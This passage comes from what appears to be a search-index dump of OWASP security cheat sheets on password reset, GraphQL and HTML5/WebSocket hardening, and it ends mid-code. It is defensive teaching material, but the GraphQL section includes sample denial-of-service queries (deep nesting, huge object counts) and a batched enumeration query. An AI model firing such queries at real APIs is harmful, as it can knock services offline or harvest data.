In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.

Even though this functionality looks straightforward and easy to implement, it is a common source of vulnerabilities, such as the renowned user enumeration attack.

The following short guidelines can be used as a quick reference to protect the forgot password service:

This cheat sheet is focused on resetting users passwords. For guidance on resetting multifactor authentication (MFA), see the relevant section in the Multifactor Authentication Cheat Sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-service","title":"Forgot Password Service","text":"

The password reset process can be broken into two main steps, detailed in the following sections.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#forgot-password-request","title":"Forgot Password Request","text":"

When a user uses the forgot password service and inputs their username or email, the below should be followed to implement a secure process:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#user-resets-password","title":"User Resets Password","text":"

Once the user has proved their identity by providing the token (sent via an email) or code (sent via SMS or other mechanisms), they should reset their password to a new secure one. In order to secure this step, the measures that should be taken are:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#methods","title":"Methods","text":"

In order to allow a user to request a password reset, you will need to have some way to identify the user, or a means to reach out to them through a side-channel.

This can be done through any of the following methods:

These methods can be used together to provide a greater degree of assurance that the user is who they claim to be. No matter what, you must ensure that a user always has a way to recover their account, even if that involves contacting the support team and proving their identity to staff.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#general-security-practices","title":"General Security Practices","text":"

It is essential to employ good security practices for the reset identifiers (tokens, codes, PINs, etc.). Some points don't apply to the offline methods, such as the lifetime restriction. All tokens and codes should be:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#url-tokens","title":"URL Tokens","text":"

URL tokens are passed in the query string of the URL, and are typically sent to the user via email. The basic overview of the process is as follows:

  1. Generate a token to the user and attach it in the URL query string.
  2. Send this token to the user via email.
  3. Don't rely on the Host header while creating the reset URLs to avoid Host Header Injection attacks. The URL should be either be hard-coded, or should be validated against a list of trusted domains.
  4. Ensure that the URL is using HTTPS.
  5. The user receives the email, and browses to the URL with the attached token.
  6. Ensure that the reset password page adds the Referrer Policy tag with the noreferrer value in order to avoid referrer leakage.
  7. Implement appropriate protection to prevent users from brute-forcing tokens in the URL, such as rate limiting.
  8. If required, perform any additional validation steps such as requiring the user to answer security questions.
  9. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.

Note: URL tokens can follow on the same behavior of the PINs by creating a restricted session from the token. Decision should be made based on the needs and the expertise of the developer.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#pins","title":"PINs","text":"

PINs are numbers (between 6 and 12 digits) that are sent to the user through a side-channel such as SMS.

  1. Generate a PIN.
  2. Send it to the user via SMS or another mechanism.
  3. Breaking the PIN up with spaces makes it easier for the user to read and enter.
  4. The user then enters the PIN along with their username on the password reset page.
  5. Create a limited session from that PIN that only permits the user to reset their password.
  6. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.
"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#offline-methods","title":"Offline Methods","text":"

Offline methods differ from other methods by allowing the user to reset their password without requesting a special identifier (such as a token or PIN) from the backend. However, authentication still needs to be conducted by the backend to ensure that the request is legitimate. Offline methods provide a certain identifier either on registration, or when the user wishes to configure it.

These identifiers should be stored offline and in a secure fashion (e.g. password managers), and the backend should properly follow the general security practices. Some implementations are built on hardware OTP tokens, certificates, or any other implementation that could be used inside of an enterprise. These are out of scope for this cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#backup-codes","title":"Backup Codes","text":"

Backup codes should be provided to the user upon registering where the user should store them offline in a secure place (such as their password manager). Some companies that implement this method are Google, GitHub, and Auth0.

While implementing this method, the following practices should be followed:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions should not be used as the sole mechanism for resetting passwords due to their answers frequently being easily guessable or obtainable by attackers. However, they can provide an additional layer of security when combined with the other methods discussed in this cheat sheet. If they are used, then ensure that secure questions are chosen as discussed in the Security Questions cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

Accounts should not be locked out in response to a forgotten password attack, as this can be used to deny access to users with known usernames. For more details on account lockouts, see the Authentication Cheat Sheet.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html","title":"GraphQL Cheat Sheet","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introduction","title":"Introduction","text":"

GraphQL is an open source query language originally developed by Facebook that can be used to build APIs as an alternative to REST and SOAP. It has gained popularity since its inception in 2012 because of the native flexibility it offers to those building and calling the API. There are GraphQL servers and clients implemented in various languages. Many companies use GraphQL including GitHub, Credit Karma, Intuit, and PayPal.

This Cheat Sheet provides guidance on the various areas that need to be considered when working with GraphQL:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#common-attacks","title":"Common Attacks","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#best-practices-and-recommendations","title":"Best Practices and Recommendations","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Adding strict input validation can help prevent against injection and DoS. The main design for GraphQL is that the user supplies one or more identifiers and the backend has a number of data fetchers making HTTP, DB, or other calls using the given identifiers. This means that user input will be included in HTTP requests, DB queries, or other requests/calls which provides opportunity for injection that could lead to various injection attacks or DoS.

See the OWASP Cheat Sheets on Input Validation and general injection prevention for full details to best perform input validation and prevent injection.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-practices","title":"General Practices","text":"

Validate all incoming data to only allow valid values (i.e. allow list).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#injection-prevention","title":"Injection Prevention","text":"

When handling input meant to be passed to another interpreter (e.g. SQL/NoSQL/ORM, OS, LDAP, XML):

For more information see the below pages:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#process-validation","title":"Process Validation","text":"

When using user input, even if sanitized and/or validated, it should not be used for certain purposes that would give a user control over data flow. For example, do not make an HTTP/resource request to a host that the user supplies (unless there is an absolute business need).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention","title":"DoS Prevention","text":"

DoS is an attack against the availability and stability of the API that can make it slow, unresponsive, or completely unavailable. This CS details several methods to limit the possibility of a DoS attack at the application level and other layers of the tech stack. There is also a CS dedicated to the topic of DoS.

Here are recommendations specific to GraphQL to limit the potential for DoS:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-limiting-depth-amount","title":"Query Limiting (Depth & Amount)","text":"

In GraphQL each query has a depth (e.g. nested objects) and each object requested in a query can have an amount specified (e.g. 99999999 of an object). By default these can both be unlimited which may lead to a DoS. You should set limits on depth and amount to prevent DoS, but this usually requires a small custom implementation as it is not natively supported by GraphQL. See this\u00a0and this page for more information about these attacks and how to add depth and amount limiting. Adding pagination can also help performance.

APIs using graphql-java can utilize the built-in MaxQueryDepthInstrumentation for depth limiting. APIs using JavaScript can use graphql-depth-limit to implement depth limiting and graphql-input-number to implement amount limiting.

Here is an example of a GraphQL query with depth N:

query evil {            # Depth: 0\nalbum(id: 42) {       # Depth: 1\nsongs {             # Depth: 2\nalbum {           # Depth: 3\n...             # Depth: ...\nalbum {id: N}   # Depth: N\n}\n}\n}\n}\n

Here is an example of a GraphQL query requesting 99999999 of an object:

query {\nauthor(id: \"abc\") {\nposts(first: 99999999) {\ntitle\n}\n}\n}\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#timeouts","title":"Timeouts","text":"

Adding timeouts can be a simple way to limit how many resources any single request can consume. But timeouts are not always effective since they may not activate until a malicious query has already consumed excessive resources. Timeout requirements will differ by API and data fetching mechanism; there isn't one timeout value that will work across the board.

At the application level, timeouts can be added for queries and resolver functions. This option is usually more effective since the query/resolution can be stopped once the timeout is reached. GraphQL does not natively support query timeouts so custom code is required. See this blog post for more about using timeouts with GraphQL or the two examples below.

JavaScript Timeout Example

Code snippet from this SO answer:

request.incrementResolverCount =  function () {\nvar runTime = Date.now() - startTime;\nif (runTime > 10000) {  // a timeout of 10 seconds\nif (request.logTimeoutError) {\nlogger('ERROR', `Request ${request.uuid} query execution timeout`);\n}\nrequest.logTimeoutError = false;\nthrow 'Query execution has timeout. Field resolution aborted';\n}\nthis.resolverCount++;\n};\n

Java Timeout Example using Instrumentation

public class TimeoutInstrumentation extends SimpleInstrumentation {\n@Override\npublic DataFetcher<?> instrumentDataFetcher(\nDataFetcher<?> dataFetcher, InstrumentationFieldFetchParameters parameters\n) {\nreturn environment ->\nObservable.fromCallable(() -> dataFetcher.get(environment))\n.subscribeOn(Schedulers.computation())\n.timeout(10, TimeUnit.SECONDS)  // timeout of 10 seconds\n.blockingFirst();\n}\n}\n

Infrastructure Timeout

Another option to add a timeout that is usually easier is adding a timeout on an HTTP server (Apache/httpd, nginx), reverse proxy, or load balancer. However, infrastructure timeouts are often inaccurate and can be bypassed more easily than application-level ones.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-cost-analysis","title":"Query Cost Analysis","text":"

Query cost analysis involves assigning costs to the resolution of fields or types in incoming queries so that the server can reject queries that cost too much to run or will consume too many resources. This is not easy to implement and may not always be necessary but it is the most thorough approach to preventing DoS. See \"Query Cost Analysis\" in\u00a0this blog post for more details on implementing this control.

Apollo recommends:

Before you go ahead and spend a ton of time implementing query cost analysis be certain you need it. Try to crash or slow down your staging API with a nasty query and see how far you get \u2014 maybe your API doesn\u2019t have these kinds of nested relationships, or maybe it can handle fetching thousands of records at a time perfectly fine and doesn\u2019t need query cost analysis!

APIs using graphql-java can utilize the built-in MaxQueryComplexityInstrumentationto to enforce max query complexity. APIs using JavaScript can utilize graphql-cost-analysis or graphql-validation-complexity to enforce max query cost.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#rate-limiting","title":"Rate Limiting","text":"

Enforcing rate limiting on a per IP or user (for anonymous and unauthorized access) basis can help limit a single user's ability to spam requests to the service and impact performance. Ideally this can be done with a WAF, API gateway, or web server (Nginx, Apache/HTTPD) to reduce the effort of adding rate limiting.

Or you could get somewhat complex with throttling and implement it in your code (non-trivial). See \"Throttling\" here for more about GraphQL-specific rate limiting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#server-side-batching-and-caching","title":"Server-side Batching and Caching","text":"

To increase efficiency of a GraphQL API and reduce its resource consumption, the batching and caching technique can be used to prevent making duplicate requests for pieces of data within a small time frame. Facebook's DataLoader tool is one way to implement this.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#system-resource-management","title":"System Resource Management","text":"

Not properly limiting the amount of resources your API can use (e.g. CPU or memory), may compromise your API responsiveness and availability, leaving it vulnerable to DoS attacks. Some limiting can be done at the operating system level.

On Linux, a combination of Control Groups(cgroups), User Limits (ulimits), and Linux Containers (LXC) can be used.

However, containerization platforms tend to make this task much easier. See the resource limiting section in the Docker Security Cheat Sheet for how to prevent DoS when using containers.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#access-control","title":"Access Control","text":"

To ensure that a GraphQL API has proper access control, do the following:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-data-access","title":"General Data Access","text":"

It's commonplace for GraphQL requests to include one or more direct IDs of objects in order to fetch or modify them. For example, a request for a certain picture may include the ID that is actually the primary key in the database for that picture. As with any request, the server must verify that the caller has access to the object they are requesting. But sometimes developers make the mistake of assuming that possession of the object's ID means the caller should have access. Failure to verify the requester's access in this case is called Broken Object Level Authentication, also known as IDOR.

It's possible for a GraphQL API to support access to objects using their ID even if that is not intended. Sometimes there are node or nodes or both fields in a query object, and these can be used to access objects directly by ID. You can check whether your schema has these fields by running this on the command-line (assuming that schema.json contains your GraphQL schema): cat schema.json | jq \".data.__schema.types[] | select(.name==\\\"Query\\\") | .fields[] | .name\" | grep node. Removing these fields from the schema should disable the functionality, but you should always apply proper authorization checks to verify the caller has access to the object they are requesting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-access-data-fetching","title":"Query Access (Data Fetching)","text":"

As part of a GraphQL API there will be various data fields that can be returned. One thing to consider is if you want different levels of access around these fields. For example, you may only want certain consumers to be able to fetch certain data fields rather than allowing all consumers to be able to retrieve all available fields. This can be done by adding a check in the code to ensure that the requester should be able to read a field they are trying to fetch.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation","title":"Mutation Access (Data Manipulation)","text":"

GraphQL supports mutation, or manipulation of data, in addition to its most common use case of data fetching. If an API implements/allows mutation then there may need to be access controls put in place to restrict which consumers, if any, can modify data through the API. Setups that require mutation access control would include APIs where only read access is intended for requesters or where only certain parties should be able to modify certain fields.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#batching-attacks","title":"Batching Attacks","text":"

GraphQL supports batching requests, also known as query batching. This lets callers to either batch multiple queries or batch requests for multiple object instances in a single network call, which allows for what is called a batching attack. This is a form of brute force attack, specific to GraphQL, that usually allows for faster and less detectable exploits. Here is the most common way to do query batching:

[\n{\nquery: < query 0 >,\nvariables: < variables for query 0 >,\n},\n{\nquery: < query 1 >,\nvariables: < variables for query 1 >,\n},\n{\nquery: < query n >\nvariables: < variables for query n >,\n}\n]\n

And here is an example query of a single batched GraphQL call requesting multiple different instances of the droid object:

query {\ndroid(id: \"2000\") {\nname\n}\nsecond:droid(id: \"2001\") {\nname\n}\nthird:droid(id: \"2002\") {\nname\n}\n}\n

In this case it could be used to enumerate every possible droid object that is stored on the server in very few network requests as opposed to a standard REST API where the requester would need to submit a different network request for every different droid ID they want to request. This type of attack can lead to the following issues:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks","title":"Mitigating Batching Attacks","text":"

In order to mitigate this type of attack you should put limits on incoming requests at the code level so that they can be applied per request. There are 3 main options:

One option is to create a code-level rate limit on how many objects that callers can request. This means the backend would track how many different object instances the caller has requested, so that they will be blocked after requesting too many objects even if they batch the object requests in a single network call. This replicates a network-level rate limit that a WAF or other tool would do.

Another option is to prevent batching for sensitive objects that you don't want to be brute forced, such as usernames, emails, passwords, OTPs, session tokens, etc. This way an attacker is forced to attack the API like a REST API and make a different network call per object instance. This is not supported natively so it will require a custom solution. However once this control is put in place other standard controls will function normally to help prevent any brute forcing.

Limiting the number of operations that can be batched and run at once is another option to mitigate GraphQL batching attacks leading to DoS. This is not a silver bullet though and should be used in conjunction with other methods.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#secure-configurations","title":"Secure Configurations","text":"

By default, most GraphQL implementations have some insecure default configurations which should be changed:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introspection-graphiql","title":"Introspection + GraphiQL","text":"

GraphQL Often comes by default with introspection and/or GraphiQL enabled and not requiring authentication. This allows the consumer of your API to learn everything about your API, schemas, mutations, deprecated fields and sometimes unwanted \"private fields\".

This might be an intended configuration if your API is designed to be consumed by external clients, but can also be an issue if the API was designed to be used internally only. Although security by obscurity is not recommended, it might be a good idea to consider removing the Introspection to avoid any leak. If your API is publicly consumed, you might want to consider disabling it for not authenticated or unauthorized users.

For internal API, the easiest approach is to just disable introspection system-wide. See this page or consult your GraphQL implementation's documentation to learn how to disable introspection altogether. If your implementation does not natively support disabling introspection or if you would like to allow some consumers/roles to have this access, you can build a filter in your service to only allow approved consumers to access the introspection system.

Keep in mind that even if introspection is disabled, attackers can still guess fields by brute forcing them. Furthermore, GraphQL has a built-in feature to return a hint when a field name that the requester provides is similar (but incorrect) to an existing field (e.g. request has usr and the response will ask Did you mean \"user?\"). You should consider disabling this feature if you have disabled the introspection, to decrease the exposure, but not all implementations of GraphQL support doing so. Shapeshifter is one tool that should be able to do this.

Disable Introspection - Java

GraphQLSchema schema = GraphQLSchema.newSchema()\n.query(StarWarsSchema.queryType)\n.fieldVisibility( NoIntrospectionGraphqlFieldVisibility.NO_INTROSPECTION_FIELD_VISIBILITY )\n.build();\n

Disable Introspection & GraphiQL - JavaScript

app.use('/graphql', graphqlHTTP({\nschema: MySessionAwareGraphQLSchema,\n+ validationRules: [NoIntrospection]\ngraphiql: process.env.NODE_ENV === 'development',\n}));\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dont-return-excessive-errors","title":"Don't Return Excessive Errors","text":"

GraphQL APIs in production shouldn't return stack traces or be in debug mode. Doing this is implementation specific, but using middleware is one popular way to have better control over errors the server returns. To disable excessive errors with Apollo Server, either pass debug: false to the Apollo Server constructor or set the NODE_ENV environment variable to 'production' or 'test'. However, if you would like to log the stack trace internally without returning it to the user see here for how to mask and log errors so they are available to the developers but not callers of the API.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#other-resources","title":"Other Resources","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#tools","title":"Tools","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#graphql-security-best-practices-documentation","title":"GraphQL Security Best Practices + Documentation","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#more-on-graphql-attacks","title":"More on GraphQL Attacks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html","title":"HTML5 Security Cheat Sheet","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#communication-apis","title":"Communication APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-messaging","title":"Web Messaging","text":"

Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websockets","title":"WebSockets","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#server-sent-events","title":"Server-Sent Events","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#storage-apis","title":"Storage APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#local-storage","title":"Local Storage","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#client-side-databases","title":"Client-side databases","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#geolocation","title":"Geolocation","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-workers","title":"Web Workers","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing","title":"Tabnabbing","text":"

Attack is described in detail in this article.

To summarize, it's the capacity to act on parent page's content or location from a newly opened page via the back link exposed by the opener JavaScript object instance.

It applies to an HTML link or a JavaScript window.open function using the attribute/instruction target to specify a target loading location that does not replace the current location and then makes the current window/tab available.

To prevent this issue, the following actions are available:

Cut the back link between the parent and the child pages:

As the behavior using the elements above is different between the browsers, either use an HTML link or JavaScript to open a window (or tab), then use this configuration to maximize the cross supports:

function openPopup(url, name, windowFeatures){\n//Open the popup and set the opener and referrer policy instruction\nvar newWindow = window.open(url, name, 'noopener,noreferrer,' + windowFeatures);\n//Reset the opener link\nnewWindow.opener = null;\n}\n

Compatibility matrix:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#sandboxed-frames","title":"Sandboxed frames","text":"

It is possible to have a fine-grained control over iframe capabilities using the value of the sandbox attribute.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#credential-and-personally-identifiable-information-pii-input-hints","title":"Credential and Personally Identifiable Information (PII) Input hints","text":"

Access a financial account from a public computer. Even though one is logged-off, the next person who uses the machine can log-in because the browser autocomplete functionality. To mitigate this, we tell the input fields not to assist in any way.

<input type=\"text\" spellcheck=\"false\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\"></input>\n

Text areas and input fields for PII (name, email, address, phone number) and login credentials (username, password) should be prevented from being stored in the browser. Use these HTML5 attributes to prevent the browser from storing PII from your form:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#offline-applications","title":"Offline Applications","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#progressive-enhancements-and-graceful-degradation-risks","title":"Progressive Enhancements and Graceful Degradation Risks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#http-headers-to-enhance-security","title":"HTTP Headers to enhance security","text":"

Consult the project OWASP Secure Headers in order to obtains the list of HTTP security headers that an application should use to enable defenses at browser level.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websocket-implementation-hints","title":"WebSocket implementation hints","text":"

In addition to the elements mentioned above, this is the list of areas for which caution must be taken during the implementation.

The section below will propose some implementation hints for every area and will go along with an application example showing all the points described.

The complete source code of the example application is available here.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#access-filtering","title":"Access filtering","text":"

During a websocket channel initiation, the browser sends the Origin HTTP request header that contains the source domain initiation for the request to handshake. Even if this header can be spoofed in a forged HTTP request (not browser based), it cannot be overridden or forced in a browser context. It then represents a good candidate to apply filtering according to an expected value.

An example of an attack using this vector, named Cross-Site WebSocket Hijacking (CSWSH), is described here.

The code below defines a configuration that applies filtering based on an \"allow list\" of origins. This ensures that only allowed origins can establish a full handshake:

import org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.server.ServerEndpointConfig;\nimport java.util.Arrays;\nimport java.util.List;\n\n/**\n * Setup handshake rules applied to all WebSocket endpoints of the application.\n * Use to setup the Access Filtering using \"Origin\" HTTP header as input information.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/index.html?javax/websocket/server/\n * ServerEndpointConfig.Configurator.html\"\n * @see \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin\"\n */\npublic class EndpointConfigurator extends ServerEndpointConfig.Configurator {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(EndpointConfigurator.class);\n\n/**\n     * Get the expected source origins from a JVM property in order to allow external configuration\n     */\nprivate static final List<String> EXPECTED_ORIGINS =  Arrays.asList(System.getProperty(\"source.origins\")\n.split(\";\"));\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean checkOrigin(String originHeaderValue) {\nboolean isAllowed = EXPECTED_ORIGINS.contains(originHeaderValue);\nString safeOriginValue = Encode.forHtmlContent(originHeaderValue);\nif (isAllowed) {\nLOG.info(\"[EndpointConfigurator] New handshake request received from {} and was accepted.\",\nsafeOriginValue);\n} else {\nLOG.warn(\"[EndpointConfigurator] New handshake request received from {} and was rejected !\",\nsafeOriginValue);\n}\nreturn isAllowed;\n}\n\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authentication-and-inputoutput-validation","title":"Authentication and Input/Output validation","text":"

When using websocket as communication channel, it's important to use an authentication method allowing the user to receive an access Token that is not automatically sent by the browser and then must be explicitly sent by the client code during each exchange.

HMAC digests are the simplest method, and JSON Web Token is a good feature rich alternative, because it allows the transport of access ticket information in a stateless and not alterable way. Moreover, it defines a validity timeframe. You can find additional information about JWT token hardening on this cheat sheet.

JSON Validation Schema are used to define and validate the expected content in input and output messages.

The code below defines the complete authentication messages flow handling:

Authentication Web Socket endpoint - Provide a WS endpoint that enables authentication exchange

import org.owasp.pocwebsocket.configurator.EndpointConfigurator;\nimport org.owasp.pocwebsocket.decoder.AuthenticationRequestDecoder;\nimport org.owasp.pocwebsocket.encoder.AuthenticationResponseEncoder;\nimport org.owasp.pocwebsocket.handler.AuthenticationMessageHandler;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.CloseReason;\nimport javax.websocket.OnClose;\nimport javax.websocket.OnError;\nimport javax.websocket.OnOpen;\nimport javax.websocket.Session;\nimport javax.websocket.server.ServerEndpoint;\n\n/**\n * Class in charge of managing the client authentication.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/javax/websocket/server/ServerEndpointConfig.Configurator.html\"\n * @see \"http://svn.apache.org/viewvc/tomcat/trunk/webapps/examples/WEB-INF/classes/websocket/\"\n */\n@ServerEndpoint(value = \"/auth\", configurator = EndpointConfigurator.class,\nsubprotocols = {\"authentication\"}, encoders = {AuthenticationResponseEncoder.class},\ndecoders = {AuthenticationRequestDecoder.class})\npublic class AuthenticationEndpoint {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationEndpoint.class);\n\n/**\n     * Handle the beginning of an exchange\n     *\n     * @param session Exchange session information\n     */\n@OnOpen\npublic void start(Session session) {\n//Define connection idle timeout and message limits in order to mitigate as much as possible\n//DOS attacks using massive connection opening or massive big messages sending\nint msgMaxSize = 1024 * 1024;//1 MB\nsession.setMaxIdleTimeout(60000);//1 minute\nsession.setMaxTextMessageBufferSize(msgMaxSize);\nsession.setMaxBinaryMessageBufferSize(msgMaxSize);\n//Log exchange start\nLOG.info(\"[AuthenticationEndpoint] Session {} started\", session.getId());\n//Affect a new message handler instance in order to process the exchange\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\",\nsession.getId());\n}\n\n/**\n     * Handle error case\n     *\n     * @param session Exchange session information\n     * @param thr     Error details\n     */\n@OnError\npublic void onError(Session session, Throwable thr) {\nLOG.error(\"[AuthenticationEndpoint] Error occur in session {}\", session.getId(), thr);\n}\n\n/**\n     * Handle close event\n     *\n     * @param session     Exchange session information\n     * @param closeReason Exchange closing reason\n     */\n@OnClose\npublic void onClose(Session session, CloseReason closeReason) {\nLOG.info(\"[AuthenticationEndpoint] Session {} closed: {}\", session.getId(),\ncloseReason.getReasonPhrase());\n}\n\n}\n

Authentication message handler - Handle all authentication requests

import org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\nimport org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.MessageHandler;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\n\n/**\n * Handle authentication message flow\n */\npublic class AuthenticationMessageHandler implements MessageHandler.Whole<AuthenticationRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationMessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic AuthenticationMessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(AuthenticationRequest message) {\nAuthenticationResponse response = null;\ntry {\n//Authenticate\nString authenticationToken = \"\";\nString accessLevel = this.authenticate(message.getLogin(), message.getPassword());\nif (accessLevel != null) {\n//Create a simple JSON token representing the authentication profile\nauthenticationToken = AuthenticationUtils.issueToken(message.getLogin(), accessLevel);\n}\n//Build the response object\nString safeLoginValue = Encode.forHtmlContent(message.getLogin());\nif (!authenticationToken.isEmpty()) {\nresponse = new AuthenticationResponse(true, authenticationToken, \"Authentication succeed !\");\nLOG.info(\"[AuthenticationMessageHandler] User {} authentication succeed.\", safeLoginValue);\n} else {\nresponse = new AuthenticationResponse(false, authenticationToken, \"Authentication failed !\");\nLOG.warn(\"[AuthenticationMessageHandler] User {} authentication failed.\", safeLoginValue);\n}\n} catch (Exception e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in authentication process.\", e);\n//Build the response object indicating that authentication fail\nresponse = new AuthenticationResponse(false, \"\", \"Authentication failed !\");\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n\n/**\n     * Authenticate the user\n     *\n     * @param login    User login\n     * @param password User password\n     * @return The access level if the authentication succeed or NULL if the authentication failed\n     */\nprivate String authenticate(String login, String password) {\n....\n}\n}\n

Utility class to manage JWT token - Handle the issuing and the validation of the access token. Simple JWT token has been used for the example (focus was made here on the global WS endpoint implementation) here without extra hardening (see this cheat sheet to apply extra hardening on the JWT token)

import com.auth0.jwt.JWT;\nimport com.auth0.jwt.JWTVerifier;\nimport com.auth0.jwt.algorithms.Algorithm;\nimport com.auth0.jwt.interfaces.DecodedJWT;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.Calendar;\nimport java.util.Locale;\n\n/**\n * Utility class to manage the authentication JWT token\n */\npublic class AuthenticationUtils {\n\n/**\n     * Build a JWT token for a user\n     *\n     * @param login       User login\n     * @param accessLevel Access level of the user\n     * @return The Base64 encoded JWT token\n     * @throws Exception If any error occur during the issuing\n     */\npublic static String issueToken(String login, String accessLevel) throws Exception {\n//Issue a JWT token with validity of 30 minutes\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nCalendar c = Calendar.getInstance();\nc.add(Calendar.MINUTE, 30);\nreturn JWT.create().withIssuer(\"WEBSOCKET-SERVER\").withSubject(login).withExpiresAt(c.getTime())\n.withClaim(\"access_level\", accessLevel.trim().toUpperCase(Locale.US)).sign(algorithm);\n}\n\n/**\n     * Verify the validity of the provided JWT token\n     *\n     * @param token JWT token encoded to verify\n     * @return The verified and decoded token with user authentication and\n     * authorization (access level) information\n     * @throws Exception If any error occur during 